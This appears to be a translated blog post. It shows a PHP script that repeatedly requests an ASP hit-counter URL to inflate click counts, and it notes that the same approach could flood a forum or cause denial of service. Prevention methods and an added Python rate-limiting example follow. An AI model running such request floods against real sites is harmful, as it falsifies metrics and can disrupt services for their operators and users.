Today I accidentally saw a website whose counter can be updated in a static page. I thought it should be done using js. When I opened the source code, it turned out to be:
<div align=center><SPAN class=Article_tdbgall>
Author: Unknown Article Source: Meidi.Net
Number of clicks:
<script language='javascript' src='/Article/GetHits.asp?ArticleID=759'></script>
Update time: 2005-5-27</SPAN>
</div>
The number of clicks is followed by an asp file for processing, so I will open this file and take a look:
document.write('210');
Right, it is the GetHits.asp file that processes ArticleID, looks up the result and outputs the count as document.write('number of times'), which can be referenced directly from the static page.
Bad guys are bad guys after all, so I thought, how can I quickly increase the number of clicks? Manual refresh is not very useful. Well, quickly write a PHP program to automatically access this file.
The PHP code is as follows:
<?php
/* access_url.php */
define('SUM', 1000);    // Number of visits required
define('L_TIME', 1000); // Script execution time limit, in seconds
define('S_TIME', 1);    // Sleep time between each visit, in seconds
$url = "http://www.xxx.com/Article/GetHits.asp?ArticleID=759"; // The address to be accessed
set_time_limit(L_TIME);

// Access the specified URL and echo what it returns
function access_url($url)
{
    if ($url == '') return false;
    $fp = fopen($url, 'r') or exit('Open url failed!');
    if ($fp) {
        while (!feof($fp)) {
            $file = fgets($fp);
            echo $file . "\n<p> </p>\n";
        }
        unset($file);
        fclose($fp);
    }
}

// Test
for ($i = 0; $i < SUM; $i++) {
    access_url($url);
    sleep(S_TIME);
}
?>
Run the above program, then the specified URL address will be accessed continuously, and naturally the number of accesses will continue to increase, achieving the effect of flooding. If the traffic is large and multiple programs are used to run it, it is easy to achieve a denial of service (DoS) effect. If the other party takes preventive measures and modifies the code and submits it to the forum, it is easy to achieve the effect of flooding the forum.
Prevention methods:
1. Use the session mechanism in the code. When the user submits, a session ID is generated. When content is submitted, check whether that session has already submitted; if it has, repeated submission is not allowed.
2. After the user submits, the user's IP address is recorded. If the user submits again within the specified time, no further submission is allowed.
3. After the user submits the content, a cookie is written on the user's client. If the user submits again, check whether there is a cookie on the client to determine whether the submission is allowed.
There are many other ways; you can search for them, or use your imagination to do better.
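As an added example (not code from the original post or from the site it describes), here is prevention method 2 applied to a GetHits-style counter, with the cookie from method 3 used only as a hint. The names HitCounter and replay are hypothetical, and an in-memory dict stands in for whatever store the real site would use.

```python
import time

class HitCounter:
    """Count a hit once per (client IP, article) within `window` seconds."""

    def __init__(self, window=3600, clock=time.monotonic):
        self.window = window
        self.clock = clock
        self.hits = {}       # article_id -> counted hits
        self.last_seen = {}  # (ip, article_id) -> time of last counted hit

    def get_hits(self, article_id, ip, has_cookie=False):
        """Handle one GetHits-style request; return the JS the page embeds."""
        now = self.clock()
        self._expire(now)
        key = (ip, article_id)
        # The cookie is only a hint: a client that sends it is a repeat
        # visitor, but a missing cookie proves nothing (a client that ignores
        # cookies never sends one), so the server-side IP record decides.
        if not has_cookie and key not in self.last_seen:
            self.hits[article_id] = self.hits.get(article_id, 0) + 1
            self.last_seen[key] = now
        return "document.write('%d');" % self.hits.get(article_id, 0)

    def _expire(self, now):
        """Forget records older than the window so memory stays bounded."""
        cutoff = now - self.window
        for key in [k for k, t in self.last_seen.items() if t <= cutoff]:
            del self.last_seen[key]

def replay(requests, window=3600):
    """Replay (time, ip, article_id, has_cookie) tuples; return the counts."""
    now = [0]
    counter = HitCounter(window, clock=lambda: now[0])
    for when, ip, article_id, has_cookie in sorted(requests):
        now[0] = when
        counter.get_hits(article_id, ip, has_cookie)
    return counter.hits

# Constructed sample: one client requesting every second for 1000 seconds,
# as the loop above does, plus ordinary readers (RFC 5737 example addresses).
SAMPLE = [(s, "192.0.2.10", 759, False) for s in range(1000)]
SAMPLE += [(5, "198.51.100.7", 759, False), (6, "198.51.100.7", 759, True),
           (40, "203.0.113.9", 759, False), (4000, "192.0.2.10", 759, False)]

if __name__ == "__main__":
    print(replay(SAMPLE))            # one-hour window
    print(replay(SAMPLE, window=0))  # no window: cookie-less requests all count
```

Keying on the IP address also undercounts readers who share one address, so the window length is a trade-off between accuracy and resistance to repeated requests.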